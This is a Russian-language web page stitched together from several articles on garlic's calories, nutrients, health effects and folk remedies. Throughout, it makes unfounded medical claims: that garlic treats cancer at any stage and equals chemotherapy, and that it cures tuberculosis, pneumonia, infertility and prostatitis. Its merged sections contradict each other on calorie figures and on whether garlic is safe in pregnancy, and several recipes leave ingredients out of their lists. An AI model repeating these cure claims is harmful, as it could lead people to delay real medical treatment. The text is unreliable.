0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Состав и калорийность чеснока

Чеснок

Чеснок – травянистый многолетник подсемейства Луковые, родиной которого является Средняя Азия. Окультуривание чеснока началось более 5-ти тысяч лет назад, это одно из самых древних растений, используемых человеком. Первоначально чеснок применяли в качестве лекарственного средства или оберега от злых духов, в пищу растение стали использовать позже. Объясняется этот факт специфическим запахом и острым вкусом чеснока.

Луковица чеснока созревает в земле, образуя от двух до 50-ти долек (зубцов), покрытых кожистой плотной шелухой. Головки чеснока имеют разнообразную окраску – светло-серые, серо-фиолетовые, жёлтые, розово-фиолетовые. Зубцы чеснока в форме полумесяца, различного размера и веса. Молодые листья и стрелки чеснока имеют ярко-зелёный цвет, не так ароматны, как зубчики, но тоже используются в пищу в сыром или маринованном виде.

Калорийность чеснока

Калорийность чеснока составляет 143 ккал на 100 грамм продукта.

Состав и полезные свойства чеснока

Чеснок является природным антибиотиком, он содержит фитонциды, которые оказывают антибактериальное и противовирусное действие. Зубчик чеснока или нарезанные дольки являются отличным профилактическим средством от простудных заболеваний, особенно в межсезонье. В составе чеснока много серы и марганца, без которого невозможно усвоение кальция, являющегося необходимым для укрепления костей. Чеснок является поставщиком органического соединения аллицина, антиоксиданта, снижающего риск возникновения инфекций дыхательных путей и предотвращающего развитие раковых опухолей. Витамины группы В, особенно В6, необходимы для деятельности центральной нервной системы, участвуют в синтезе серотонина – гормона радости и удовольствия (calorizator). Чеснок рекомендуют использовать в качестве средства, нормализующего кишечную флору и укрепляющего защитные силы организма.

Вред чеснока

Чрезмерное употребление чеснока не рекомендовано лицам, имеющим любые заболевания почек, желчнокаменную болезнь, язву желудка или кишечника, анемию.

Выращивание чеснока

На приусадебных участках чеснок выращивают двумя способами – высаживая зубцы в сентябре-октябре (озимые сорта) или весной, по мере готовности почвы (яровой чеснок). Некоторые сорта чеснока дают стрелку, встречаются и нестрелкующиеся виды. Самые распространённые сорта озимого чеснока: Любаша, Витязь, Дубковский, Комсомолец, Грибовский юбилейный, Спика, Новосибирский, Надёжный, Мессидор. Из яровых выделяют следующие сорта, дающие стойкий урожай: Гулливер, Самородок, Викторио, Дегтярский, Пермяк, Уралец, Еленовский.

Выбор и хранение чеснока

Покупая чеснок, нужно выбрать сухие, неповреждённые головки, без зелёных ростков, с сухим «хвостиком». Дольки должны плотно прилегать друг к другу и быть плотными.

Хранить чеснок следует в прохладном, сухом и тёмном месте, с доступом воздуха. Очищенные зубцы несколько дней можно сохранить в холодильнике, поместив в стеклянную плотно закрытую ёмкость, чтобы избежать распространения специфического чесночного запаха.

Чеснок в кулинарии

Чеснок используют в кулинарии как приправу, добавляя его к мясным, овощным и творожным блюдам, супам и маринадам. Чаще всего чеснок очищают и измельчают, но в некоторых рецептах нужно разрезать пополам неочищенную головку чеснока и добавить в блюдо (плов, овощное рагу). Чеснок маринуют, сушат и солят, в азиатской кухне популярен чёрный чеснок, многие используют чесночную соль вместо обычной, без чеснока невозможно приготовить соус айоли. Стрелки и молодые листья чеснока используют в сыром виде как витаминную добавку к супам и салатам, их также маринуют и сушат.

Больше о чесноке смотрите в видеоролике телепрограммы «О самом главном».

Чеснок – полезные свойства, вред и противопоказания

Полезное воздействие чеснока на организм человека известно с глубокой древности. Химический состав пряного растения богат макроэлементами и витаминами. Чеснок можно жарить, тушить и даже запекать в целом виде, но овощ не растеряет целебных свойств, которые широко и повсеместно применяются в народной медицине. С помощью чеснока можно укрепить иммунитет, снизить уровень «вредного» холестерина в крови, повысить выносливость и работоспособность, что особенно ценится спортсменами.

Состав чеснока и калорийность

В составе чеснока богатый набор витаминов, макро- и микроэлементов. Научно доказано, что продукт содержит в себе природные антибиотики. (Источник — Википедия). Калорийность чеснока в свежем виде составляет 148,5 ккал на 100 г и изменяется в зависимости от способа приготовления, а именно:

  • сушеный – 344,8 ккал;
  • запеченный – 15,7 ккал;
  • маринованный или соленый – 46,5 ккал;
  • вареный – 20,1 ккал;
  • жареный – 41,4 ккал;
  • тушеный – 143,2 ккал;
  • стручки (стрелки) чеснока – 24,2 ккал.

В 1 зубчике чеснока содержится примерно 5,8 ккал.

Пищевая ценность свежего продукта на 100 г:

  • углеводы – 29,9 г;
  • белки – 6,5 г;
  • жиры – 0,5 г;
  • вода – 60 г;
  • пищевые волокна – 1,5 г;
  • зола – 1,5 г.

Химический состав чеснока на 100 г представлен в таблице:

Наименование элементов Единицы измерения Содержание в продукте
Молибден мкг 25,4
Алюминий мг 0,455
Медь мг 0,13
Бор мкг 31,2
Никель мкг 14
Селен мкг 14,2
Цинк мг 1,03
Калий мг 260
Сера мг 63,6
Кальций мг 180
Фосфор мг 100
Хлор мг 30
Магний мг 30
Витамин С мг 10
Витамин РР мг 2,8
Тиамин мг 0,08
Витамин В6 мг 0,6
Холин мг 23,2

Кроме того, в составе продукта содержатся в небольшом количестве полиненасыщенные жирные кислоты омега-6 – 0,0229 г и омега-3 – 0,02 г, а также крахмал – 27 г и дисахариды – 3,9 г на 100 г.

Полезные свойства для здоровья

Благодаря уникальному химическому составу чеснок обладает полезными свойствами для здоровья человека:

  1. Продукт способствует улучшению пищеварения, особенно полезно добавлять его в блюда, которые содержат много жира. Помимо этого, пряное растение оказывает благотворное воздействие на работу печени и желчного пузыря.
  2. Систематическое употребление чеснока помогает снизить уровень «вредного» холестерина в крови и повысить уровень полезного.
  3. Чеснок помогает нормализовать артериальное давление.
  4. Продукт предотвращает появление тромбов и обладает способностью препятствовать процессу склеивания тромбоцитов.
  5. Пряное растение полезно употреблять при наличии атеросклероза — продукт повышает фибринолитическую активность.
  6. Чеснок выступает профилактическим средством от онкологических заболеваний за счет входящего в состав пряного растения аллицина. Кроме того, он эффективен и во время лечения рака.
  7. Растение обладает антисептическими свойствами за счет аллицина, способно бороться с кишечной палочкой и золотистым стафилококкам. Соком или раздавленной мякотью чеснока можно обрабатывать раны.

Чеснок полезно употреблять спортсменам и людям физического труда — продукт повышает выносливость и работоспособность.

Польза чеснока для женского организма

Чеснок снижает болезненные ощущения при таком заболевании, как бедренный остеоартрит, от которого в пожилом возрасте чаще страдают именно женщины. Продукт рекомендуется употреблять регулярно в качестве профилактики указанного заболевания. Серные соединения, входящие в состав чеснока, благотворно сказываются на состоянии связок, хрящей и суставов.

Систематическое употребление продукта снижает риск развития раковых опухолей в молочных железах и мочеполовой системе. Благодаря пряному растению можно быстрее восстановить организм после стрессовых ситуаций, улучшить состояние нервной системы и нормализовать режим сна.

Кроме того, чеснок применяется в косметических целях для улучшения состояния кожи и предотвращения выпадения волос.

Польза для мужчин

Наиболее известная польза для мужчин от систематического употребления чеснока – усиление потенции, поскольку этот продукт — природный афродизиак. Чеснок при систематическом употреблении снижает риск возникновения злокачественных опухолей предстательной железы примерно на 50%.

Благодаря способности пряного растения бороться с бактериями, предотвращается развитие инфекций, которые могут привести к мужскому бесплодию.

По статистике мужчины чаще болеют атеросклерозом, чем женщины, а регулярное добавление чеснока в пищу, неважно в каком виде: свежем, вареном, жареном, запеченном или сушеном, – очистит сосуды и предотвратит образование холестериновых бляшек в крови.

Лечебные свойства

В народной медицине чеснок используется как в профилактических целях, так и в целебных. Большее внимание необходимо уделить продукту в период распространения инфекционных заболеваний.

Лечебные свойства пряного растения распространяются на:

  1. Воспаление горла. Чтобы справиться с ангиной, необходимо приготовить чесночную настойку для питья (5 измельченных зубчиков залить стаканом кислого молока, настаивать полчаса, пить по 1 ч. ложечке пару раз в сутки) или полоскания горла (1 пропущенный через пресс зубчик залить стаканом тепленькой воды, дать постоять 1 час, а затем процедить).
  2. Грипп или простуду. Вылечить инфекционное заболевание с помощью одного лишь измельченного чеснока проблематично, его необходимо использовать как дополнительное средство вместе с медом, смешивая в равных количествах. Принимать народное лекарство достаточно пару раза в сутки за полчаса перед приемом пищи.
  3. Атеросклероз. Лечебную настойку готовят с чесноком на основе меда. Для этого необходимо взять половину столовой ложечки сока пряного растения и смешать с медом в одинаковом количестве. Принимать 3 раза в сутки за 30 минут до приема пищи.
  4. Бронхиальную астму. Отвар чеснока на молоке существенно облегчает симптомы заболевания. Необходимо взять 12-15 зубьев чеснока и сварить в 0,5 ст. молока, выпивать настойку достаточно раз в сутки.
  5. Чрезмерную вязкость крови. Настойка, которая способствует разжижению крови, делается из очищенных зубьев чеснока и очищенной воды в соотношении 1 столовая ложечка мякоти на 3 столовые ложечки жидкости. Дольки чеснока натереть на мелкой терке и залить водой. Заготовку держать в темном месте на протяжении 2 недель, периодически помешивая. Затем настойку процедить и добавить по 1 столовой ложечке меда и лимона. Съедать по 1 ст. л. на ночь. Количество компонентов можно увеличить, главное – придерживаться пропорций.

Вред и противопоказания

Рекомендованная доза потребления чеснока в сутки составляет 2, максимум 3 дольки, при злоупотреблении продуктом может быть нанесен вред здоровью.

Противопоказания к употреблению пряного растения следующие:

  • аллергия;
  • патологии печени, такие как гепатит или нефроз;
  • индивидуальная непереносимость;
  • язва желудка;
  • гастрит;
  • панкреатит;
  • обостренная форма других заболеваний ЖКТ.

Запрещено употреблять чеснок кормящим женщинам.

Людям, работа которых требует повышенной внимательности и быстрой реакции (пилоты, хирурги, водители и т. п.), не рекомендуется есть продукт перед работой, так как чеснок может стать причиной рассеянности.

Чрезмерное употребление продукта может вызвать изжогу, вздутие живота и скопление газов в кишечнике. Категорически запрещено употреблять чеснок людям, принимающим препараты для разжижения крови, поскольку чеснок обладает похожими свойствами и в случае ранения кровотечение остановить будет сложно.

Химический состав чеснока: описание, свойства и калорийность

На протяжении нескольких столетий в народе бытует мнение, что, если регулярно кушать чеснок, то можно забыть о простудных заболеваниях, так как этот овощ «отпугивает» все инфекции и вирусы, а также способствует укреплению иммунной системы. Возможно, именно полезные свойства сделали данную культуру весьма популярной почти у всех народов мира. Помимо специфического запаха и острого вкуса, которые становятся превосходным «украшением» блюда, имеет важность химический состав чеснока. Он представлен макро- и микроэлементами, витаминами, минералами, белками, жирами, углеводами и другими полезными для организма веществами. Чеснок имеет низкую калорийность, поэтому популярен и в диетическом питании. Используется не только в кулинарии, но и в нетрадиционной медицине, благодаря своим лечебным свойствам. Люди разных стран мира употребляют дольки чеснока, а также молодые стебли (стрелки) и листья культуры.

Так как этот продукт является одним из наиболее популярных овощей в мире, логично будет познакомиться с ним поближе. В статье будет рассказано о химическом составе, пищевой ценности и калорийности чеснока, а также о его свойствах. Ведь данный овощ может оказать как благоприятное, так и негативное воздействие на организм человека.

Что такое чеснок? Краткое описание растения

Данная овощная культура относится к роду Лук и семейству Амариллисовые. В оригинальном латинском языке название звучит как Allium sativum. Это многолетнее травянистое растение, обладающее острым вкусом и специфическим запахом, которыми наделяют его тиоэфиры (органические сульфиды), содержащиеся в составе. Чеснок обладает высокими антисептическими свойствами, благодаря чему успешно используется в традиционной и неофициальной медицине и лечебном питании. В кулинарии используются «зубки», молодые стебли и листья.

Химический состав чеснока: информация, которая пригодится каждому

Данная овощная культура содержит в своем составе огромное количество различных полезных элементов, оказывающих благотворное влияние на деятельность организма. Ниже представлена таблица, из которой можно узнать о содержании в чесноке витаминов и минеральных веществ. Количество указано в миллиграммах, также представлено процентное соотношение относительно суточной нормы. Содержание веществ определено на 100 г продукта.

Кроме этого, чеснок содержит эфирное масло, в котором был обнаружен аллицин и другие органические соединения группы фитонцидов (сульфидной группы).

Пищевая ценность плодов

Выше был подробно описан химический состав чеснока. Пищевая ценность продукта играет не менее важную роль. В чесноке содержатся не только белки, жиры и углеводы, являющиеся «основой», но и другие значимые вещества. Количество представлено в граммах и определено на 100 г продукта.

0.5 (из них по 0.1 г насыщенных и полиненасыщенных жирных кислот)

29.9 (из них 1.5 – пищевые волокна, 3.9 – моно- и дисахариды, 26 – крахмал)

Калорийность чеснока

Пищевая ценность продукта также определяется количеством ккал в 100 г. Стоит сказать, что чеснок является низкокалорийным продуктом, так как в нем всего 149 ккал.

Все данные, представленные выше, могут незначительно отличаться. Все эти показатели зависят от условий выращивания, в частности, от региона и климатической зоны, в которой он рос, а также от сорта овощной культуры.

Чеснок в виде порошка, или высушенный овощ

Приправа продается во многих продуктовых магазинах. Она готовится из высушенных и перетертых зубчиков. Химический состав порошка чеснока представлен теми же веществами, только их количество на 100 г продукта может отличаться. Пищевая ценность составляет 331 ккал. Это 16,55 г белков, 0,73 г жиров и 72,73 г углеводов.

Чесночная приправа в виде порошка обладает выраженным ароматом, но, в отличие от сырого овоща, оставляет дыхание свежим. Данная форма продукта является отличной альтернативой именно благодаря таким своим качествам.

О химическом составе сушеного чеснока

  • Минералы: кальций, железо, магний, фосфор, калий, натрий, цинк, медь, марганец, селен.
  • Витамины: аскорбиновая кислота, тиамин, рибофлавин, никотиновая и пантотеновая кислоты, пиридоксин, фолиевая кислота, холин, бетаин, альфа-токоферол, филлохинон.
  • Липиды: насыщенные, мононенасыщенные, полиненасыщенные жирные кислоты, фитостеролы.
  • Аминокислоты: триптофан, треонин, изолейцин, лейцин, лизин, метионин, цистин, фенилаланин, тирозин, валин, аргинин, гистидин, аланин, аспарагиновая и глутаминовая кислоты, глицин, пролин, серин.

Чем богат молодой зеленый чеснок?

Многие люди обрезают листья овощной культуры и выбрасывают либо в мусорное ведро, либо в компостную яму. Мало кто знает, что зеленая часть молодого чеснока обладает не меньшей пользой, чем «зубчики». Существуют даже кулинарные рецепты, из которых можно узнать, как приготовить листья, и в каких случаях их лучше всего использовать.

Мы уже рассмотрели химический состав чеснока (в таблице выше). В принципе, ту же информацию можно было бы перенести и в этот раздел, но не будем повторяться. Молодые зеленые листья, равно как и плод в свежем и сушеном виде, богаты витаминами группы B, а также C, E, K и PP. В них содержатся заменимые и незаменимые аминокислоты, макро- и микроэлементы, которые делают молодой плод и листья не менее полезными. Стоит отметить, что содержание части веществ в данном случае даже больше, чем в «старом» чесноке. Пищевая ценность составляет 149 ккал. В молодом чесноке содержится 0,5 г жиров, 2,1 г пищевых волокон, 6,36 г белков, 33,06 г углеводов, 1,5 г золы и 58,58 г воды.

О положительных качествах овощной культуры

Теперь самое интересное – полезные свойства чеснока. Состав чеснока таков, что овощ оказывает благотворное влияние на все системы человеческого организма. При этом важно знать, что нормальное суточное количество составляет не более 15 г.

Множество различных полезных веществ в составе, безусловно, имеет огромное значение при рассмотрении полезных свойств данного продукта. И обо всем этого будет рассказано в статье. Но начать стоит с эфирного масла чеснока. Его содержание в овощной культуре может составлять от 0,23 до 0,74 %. Чем оно примечательно? Именно в эфирном масле содержится аллицин – главный компонент в биохимическом составе чеснока. Он представляет собой мощный антиоксидант, действие которого направлено на связывание опасных веществ – свободных радикалов. Этот процесс важен, так как, если им не к кому «прикрепиться», произойдет самое ужасное – разрушение генетического аппарата клетки. Это грозит неконтролируемым делением клеток и, как следствие, образованием злокачественного новообразования. Клетка с нарушенным генетическим аппаратом производит «чужеродные» для организма белки, которые вызывают токсическое отравление. В ходе проведенных исследований было установлено, что чеснок является эффективным терапевтическим средством в борьбе с онкологическими заболеваниями на любых стадиях.

Аллицин является сильнейшим антисептиком, который угнетает деятельность патогенных микроорганизмов. При этом полезные бактерии остаются в организме. Как аллицину удается отделять «хорошее» от «плохого», ведь даже антибиотики уничтожают все подряд, ученым пока выяснить не удалось. Тем не менее этот факт заслуживает внимания.

Рассмотреть все полезные свойства чеснока очень сложно. Это наверняка займет целый том. Но коротко узнать о его положительных качествах вполне реально. Помимо противостояния свободным радикалам, чеснок также препятствует развитию дисбактериоза, грибкового поражения организма как внутри, так и снаружи, а также кишечным инфекциям и глистным инвазиям. Кроме этого, овощная культура славится такими целебными свойствами:

  • поддержание правильной работы сердечно-сосудистой системы;
  • снижение артериального давления;
  • нормализация состава крови;
  • снижение уровня вредного холестерина в крови;
  • препятствие тромбообразованию;
  • облегчение усвоения глюкозы;
  • укрепление защитных сил организма;
  • нормализация работы желудочно-кишечного тракта.

В химический состав чеснока входит витамин B1, стабилизирующий работу нервной системы. Поэтому овощная культура способна успокаивать и снимать стресс. Витамин B1 также участвует в проведении энергетических процессов в клетках. Фитонциды делают чеснок отличным профилактическим средством против острых респираторно-вирусных инфекций.

Что касается непосредственно питания, овощная культура «обеззараживает» кишечник, препятствуя развитию в ЖКТ различных патологий. Чеснок рекомендуют добавлять к жирным блюдам, чтобы стимулировать пищеварение, запуская процесс выработки желчи и упрощая переваривание. Особенно полезен овощ в осенне-весенний период, так как он богат витаминами и различными элементами. Также рекомендуется ежедневно съедать немного чеснока, чтобы предотвратить возникновение различных патологий во всех системах.

Вред, который может нанести организму овощ, и некоторые рекомендации

Химический состав чеснока способен не только принести пользу, но и ухудшить самочувствие при некоторых состояниях. Так, нельзя употреблять его в большом количестве. Известны случаи, когда чрезмерное «доза» приводила к спазму коронарных сосудов и сосудов головного мозга. Так что следует помнить, что все хорошо в меру.

Последнее время на просторах интернета можно увидеть информацию о том, что чеснок является почти ядовитым овощем, и употребление его в пищу крайне вредно для человека. Якобы это чревато замедлением реакций и процесса мышления. Однако научного подтверждения этим данным нет.

Некоторые родители заставляют детей употреблять данную овощную культуру, ведь «это же так полезно для здоровья». Не стоит насильно скармливать ребенку чеснок. Ведь сами же взрослые не питаются тем продуктом, который ему не нравится? Вот и детей мучить не нужно.

Хоть и богат самыми разнообразными полезными веществами состав, свойства чеснока могут быть и негативными. Например, индивидуальная непереносимость продукта. Если такое состояние было выявлено, употреблять овощную культуру нельзя ни в коем случае. Кстати, чеснок нужно кушать только в сыром виде, или же добавлять в блюда в самом конце приготовления, так как термическая обработка убивает все полезные вещества.

Чеснок также нельзя употреблять при температуре тела свыше 38 градусов и при избыточном весе. Особенно если ожирение диагностировано у ребенка. Если взрослый еще как-то сможет бороться с повышенным аппетитом, то детям с этим справляться сложнее. Конечно, в составе чеснока — витамины, а калорийность его низкая, но овощ, как уже говорилось, способствует выработке желудочного сока. Этот процесс может вызывать лишний аппетит.

Не рекомендует кушать чеснок перед сном и при расстройствах нервной системы, как, например, эпилепсия. Он противопоказан при серьезных заболеваниях ЖКТ и почек.

Чем славится чеснок в народной медицине и домашней косметологии?

Существует множество рецептов, которые можно повторить дома для устранения различных проблем. Например, из чеснока готовятся различные смеси и настои, способные избавить от бессонницы, зубной боли, насморка, ангины, простуды и даже бронхита и коклюша. Есть «лекарства» на основе данной овощной культуры, помогающие при атеросклерозе и хронической усталости, стенокардии и одышке. Например, если одолела ангина, советуют 3-4 дольки чеснока заливать кипящим молоком и добавлять столовую ложку меда. А при коклюше отличным вспомогательным лечебным средством является втирание смеси из свиного топленого жира и чесночного сока в шею и грудную клетку.

Описание чеснока, состав и его полезные свойства дают повод задуматься о том, как полезен продукт в косметологии. Он помогает устранить различные проблемы, связанные с волосами, кожей и ногтями.

Например, чтобы избавиться от воспалительных процессов на кожном покрове, лицо следует протирать маслом растительного происхождения, а затем наносить кашицу из измельченного чеснока. Кроме этого, овощная культура помогает избавиться от различных наростов на коже, как бородавки, мозоли и папилломы.

Чеснок – это универсальное средство от многих патологий, развивающихся внутри организма. Это уникальная приправа, без которой не смогут быть полноценными многие первые и вторые блюда, а также закуски. Не нужно употреблять его в большом количестве, важно просто знать, что даже маленький «зубчик», если кушать его ежедневно (при отсутствии противопоказаний), способен оказать положительное влияние, насытив организм разнообразными полезными веществами. А для тех, кому неприятен запах изо рта после употребления этого продукта, рекомендуется попробовать овощ в порошке. И лучше заготовить такую приправу самостоятельно из домашнего чеснока, так как его полезные свойства напрямую зависят от качества посевного материала и условий выращивания.

Вся правда о чесноке для здоровья мужчин и женщин

Чеснок – травянистое растение семейства луковых, которое пользуется широким спросом. Практически все наслышаны о пользе чеснока, хотя часто вспоминают о его целебных свойствах лишь при борьбе с простудой. А вот о вреде чеснока почти никто ничего не знает. Когда заходит речь о его негативных проявлениях, в основном вспоминают только зловонный запах изо рта. Ниже будут приведены наиболее полные данные, как о пользе, так и о негативном влиянии этого овоща.

Биохимический состав и калорийность чеснока

Чеснок издревле высоко ценится как природное лекарство. Его польза для организма основывается на разнообразных биохимических компонентах. В 100 грамм продукта имеется 150 калорий. В его состав входят следующие питательные компоненты:

  • Жиры – 0,4;
  • Белки – 6,3;
  • Пищевые волокна – 1,4;
  • Углеводы – 30;
  • Зола – 1,7;
  • Воды – 59, 9;
  • Кислоты – 0, 3.

Минеральные компоненты чеснока: магний, цинк, натрий и др. Также в чесноке содержится множество элементов группы С, РР, В, D, эфирных масел и фитонцидов.

Полезные и лечебные свойства чеснока

  1. Укрепление нервной системы. В овоще присутствует витамин В1, который улучшает работу клеток нервной системы. Также он принимает участие в переработке глюкозы и снабжении мозга нужным количеством энергии.
  2. Чеснок для суставов. В этом растении имеется много серы, которая помогает синтезировать метионин – мощный гепатопротектор, предотвращающий негативные изменения состава хрящей.
  3. Чеснок и вирусы. Самое известное свойство данного овоща – способность подавлять всевозможные вирусные инфекции и простуды благодаря высокому содержанию фитонцидов и растительных агентов.
  4. Профилактика болезней печени. Чеснок нормализует работу данного органа, так как регулирует процессы, происходящие в желчном пузыре и желчных каналах. Также он активизирует синтез желчи.
  5. Общеукрепляющее воздействие. Чеснок содержит хром, мышьяк, бета-каротин, медь и магний. В этих микроэлементах человеческий организм особенно нуждается в весеннее время года.
  6. Предупреждение инсульта и инфаркта. Составляющие чеснока уменьшают риск тромбообразования, так как понижают вязкость крови.
  7. Воздействие на пищеварение. Неспроста чеснок добавляется во многие тяжелые и жирные блюда, которые перевариваются с трудом. Он способствует синтезу желчи, которая регулирует пищеварительный процесс.
  8. Профилактика раковых заболеваний. Ученые утверждают, что активные вещества, входящие в состав чеснока, подавляют рост злокачественных образований. Постоянное потребление этого овоща может приравниваться к регулярной химиотерапии.

Для профилактики доктора советуют употреблять не больше двух долек чеснока. Для лечения различных недугов дозировка этого овоща указывается специалистом с учетом особенностей организма, общего состояния больного и имеющихся показаний.

Чеснок для женщин

В чесноке содержится множество минералов, необходимых для поддержания женского здоровья. Обладая мощным противовоспалительным, антибактериальным и противогрибковым эффектом, он способствует избавлению от целого перечня заболеваний (цистит, кольпит и др.).

Регулярное потребление чеснока помогает наладить гормональный фон и менструальный цикл. При наступлении климакса чеснок облегчает сопутствующие симптомы.

Диетологи считают, что в период похудения и ограничений в еде важно восполнять недостаток определенных микроэлементов, которые как раз имеются в чесноке. Данное растение особенно полезно включать в рацион с высоким содержанием белков. В чесноке имеется клетчатка, которая способствует процессу усвоения трудноперевариваемой пищи.

Для многих может стать неожиданностью, что чеснок используется для ухода за кожей лица, помогает избавиться от гнойных прыщей и снимает воспаления. Также это растение применяется для ухода за ногтями, помогает улучшить рост волос и избавляет от перхоти.

Чеснок для мужчин

Чеснок – уникальное растение, которое позволяет мужчинам нейтрализовать многие «личные проблемы». В их числе импотенция и простатит. Овощ стимулирует выработку гормона тестостерона, имеющего большую роль в мужском организме. Эффективность лечения чесноком обеспечивается также благодаря нормализации кровообращения и расширению сосудов.

Из-за нехватки селена происходит нарушение репродуктивной функции. Регулярное потребление чеснока повышает активность сперматозоидов и, соответственно, лечит мужское бесплодие.

Чеснок помогает мужчинам, которые хотят увеличить мышечную массу и занимаются спортом. Для этого необходимо за час до тренировки съедать два-три зубчика чеснока.

Вред от чеснока

  1. Чеснок и клетки мозга. Некоторые исследования показывают, что этот овощ может быть токсичен для мозга, провоцируя негативные изменения его клеток.
  2. Чеснок как причина возникновения ботулизма. Сернистые компоненты чеснока – превосходная среда для развития клостридии ботулизма. Как правило, ботулизм стремительно развивается в сыром чесноке, который хранится в растительном масле в теплом помещении.
  3. Чеснок и ЖКТ. Данное растение может провоцировать жжение во рту, вздутие живота, рвоту. Эти проявления сильнее всего выражены при употреблении большого количества чеснока в сыром виде. Если у вас гастрит, язва желудка, эзогафит или иные проблемы с ЖКТ, то лучше отказаться от чеснока совсем.
  4. Аллергия. Небольшое число людей страдает от аллергии на чеснок, однако сбрасывать со счетов этот фактор не стоит, так как сильные аллергические приступы могут представлять опасность для жизни.
  5. Вред при кровотечениях. За 10 дней до запланированной операции рекомендуется прекратить употребление чеснока, так как он разжижает кровь и усугубляет кровотечение.
  6. Вред для кожных покровов. При попадании чесночного сока или мелко нарезанного чеснока на чувствительную кожу, могут появиться раздражения, покраснения и боль. Иногда чеснок может спровоцировать даже ожог.
  7. Чеснок при беременности. Данное растение не рекомендуется употреблять во время беременности, так как оно неблагоприятно влияет на околоплодные воды. Также нежелательно есть его во время лактации.

Химический состав и калорийность чеснока

Самое чудодейственное природное лекарство – это чеснок. На его основе готовят различные препараты и употребляют сырым. Лечение чесноком используют несколько тысяч лет. Мы расскажем о всех тонкостях употребления и раскроем секреты лучших целебных рецептов.

Чеснок включает:

• калий (помогает выводить лишнюю воду из организма и является профилактическим средством против инсульта и гипертонии);

• витамин Д (помогает укреплять иммунную систему);

• фитонциды – это природные антибиотики;

• натрий – связующее звено в регулировании обменных процессов;

• экстрактивные вещества(помогают лучше работать пищеварительным железам);

• антиоксиданты (помогают беречь здоровье клеток организма);

• фитостерины (помогают омолаживать и очищать организм);

• кремниевую кислоту, которая делает кожу красивой и упругой;

• фосфорную кислоту, обладающую антиоксидантными свойствами.

Рассмотрим пищевую ценность в одной порции (100 г):

• калории – 149 ккал;

• пищевые волокна – 1,5 г;

В чесноке содержится идеальный лечебный состав, благодаря которому оказывается благотворное воздействие на здоровье. Овощ:

• понижает артериальное давление:

• оказывает ранозаживляющее действие, антитоксическое, обезболивающее и противомикробное;

• препятствует онкологическим образованиям;

• оказывает противоглистное действие;

• помогает в борьбе с авитаминозом;

• помогает снизить уровень холестерина;

• оказывает содействие в снижении кровяного давления;

• это натуральный антибиотик, который укрепляет иммунитет;

• помогает организму оказывать противостояние вредному воздействию окружающей среды;

• убивает огромное число различных бактерий;

• хорошее средство от простудных (сезонных) заболеваний;

• лечит расстройства нервной системы;

• положительно влияет на работоспособность сердца;

• помогает в борьбе с пневмонией, туберкулезом, коклюшем, легким абсцессом;

• оказывает позитивное влияние на работу ЖКТ;

• лечит заболевания кожных покровов.

Женскому организму овощ помогает подавлять рак молочной железы и матки. Оказывает помощь в борьбе с бесплодием. Разрешается употребление беременным и снабжает их организм фолиевой кислотой, которая весьма полезна для развития плода.

Чтобы достигнуть лечебного эффекта необходимо употреблять ежедневно головки чеснока в количестве двух-трех штук и обязательно натощак. Если вы решили избавиться от конкретного заболевания при помощи настоек на основе чесночных долек, то следует придерживаться способа употребления в соответствии с рекомендациями лечащего врача.

Лечение чесноком, не жуя

Народные целители рекомендуют употреблять чесночные зубчики в целом виде, предварительно не разжевывая. Связывают это с тем, что, нарушая структуру зубков, значительное количество полезных компонентов выветривается и не доходит до необходимого места в организме. Такой метод чаще всего рекомендуют для избавления от паразитов. Также вы сможете обезопасить себя от неприятного, характерного запаха из ротовой полости, который неизбежно появляется при разжевывании.

Но, чтобы достичь желаемого эффекта, необходимо знать, как правильно его употребить. Утром подготовьте чесночный зубчик, который должен быть небольшого размера. Очистите от шелухи, затем обязательно промойте. Поместите на язык и запейте большим количеством жидкости, желательно водой. Завтракать можно только через полчаса.

Это самый эффективный способ, результат от которого можно заметить уже через четыре дня.

Лучшие лечебные рецепты с чесноком

Если вы хотите очистить кровь, снизить артериальное давление, очистить ЖКТ, справиться с проблемами сосудов головного мозга, то следует приготовить настойку.

Ингредиенты:

• водка, можно использовать спирт.

Приготовление:

1. Порубить чесночные зубчики. Поместить в емкость. Подготовленный продукт должен наполнить третью часть емкости.

2. Залить водкой до краев емкости. Укрыть и убрать в темное место. Выдержать две недели.

3. Употребляют такую настойку по пять капель не более трех раз в день.

От кашля

Ингредиенты:

• мед – 0,5 ст. ложки;

• сливочное масло – 1 ч. ложка;

• чеснок — 3 зубка.

Приготовление:

1. Натереть очень мелко чесночные зубчики. Залить молоком и поставить вариться. Добавить масло, через три минуты мед.

2. Регулярно перемешивая варить восемь минут.

3. Принимать рекомендуется пока состояние не улучшится. Детям по полкружки пару раз за день. Для взрослых норма увеличивается в два раза.

На основе меда и уксуса

Данный рецепт поможет справиться с гриппом, импотенцией, артритом, астмой, артрозом, раком, ожирением. Витаминная смесь поможет очистить всевозможные отложения в сосудах и печени, нормализовать давление, улучшить гормональный фон.

Ингредиенты:

• чеснок – 3 головки;

• уксус 9% – 240 мл.

Приготовление:

1. Натереть чесночные дольки. Залить уксусом. Перемешать. Затем добавить мед, который должен быть жидким. Перемешать.

2. Отставить в темное помещение на неделю.

3. Применяют по утрам, обязательно натощак. Предварительно следует разбавлять водой. На кружку воды необходимо добавлять две маленькие ложки настойки.

Лечение простатита

Хорошим эффектом обладает отвар на основе молока.

Ингредиенты:

• рубленые чесночные зубки – 1 ст. ложка.

Приготовление:

1. Вскипятить молоко. Засыпать чесночные зубчики.

2. Проварить четверть часа. Процедить. Пить по 120 мл отвара пока не наступит улучшение. В день три раза.

Против паразитов

Ингредиенты:

• чеснок – 2 ч. ложки.

Приготовление:

1. Натереть при помощи мелкого помола терки чесночные зубчики. Отмерить указанную норму и поместить в молоко.

2. Проварить смесь шесть минут. Утром выпивать по пять глотков (натощак).

Лечение гипертонии

Ингредиенты:

• спирт (96%) – 100 мл.

Приготовление:

1. Разрезать чесночные дольки. Залить спиртом. Герметично закрыть.

2. Отставить на неделю. Периодически необходимо взбалтывать. Зубки убрать. В спирт налить мятную настойку. Количество можете регулировать по собственному желанию.

3. Выпивать перед каждым основным принятием пищи. Разовая доза 20 капель, которые необходимо развести в трех ложках воды.

От повышенного холестерина

Ингредиенты:

• чеснок – 4 головки;

Приготовление:

1. Разрезать лимон. Поместить в чашу блендера. Добавить указанное количество чесночных зубчиков. Взбить.

2. Поместить полученную массу в емкость с объемом три литра. До горла залить водой. Отставить на трое суток. Процедить.

3. Выпивать три раза в день. Разовая доза 100 мл. Курс лечения чесноком и лимоном составляет 40 дней. Перерыв делать нельзя, поэтому заранее следует готовить следующую норму настойки.

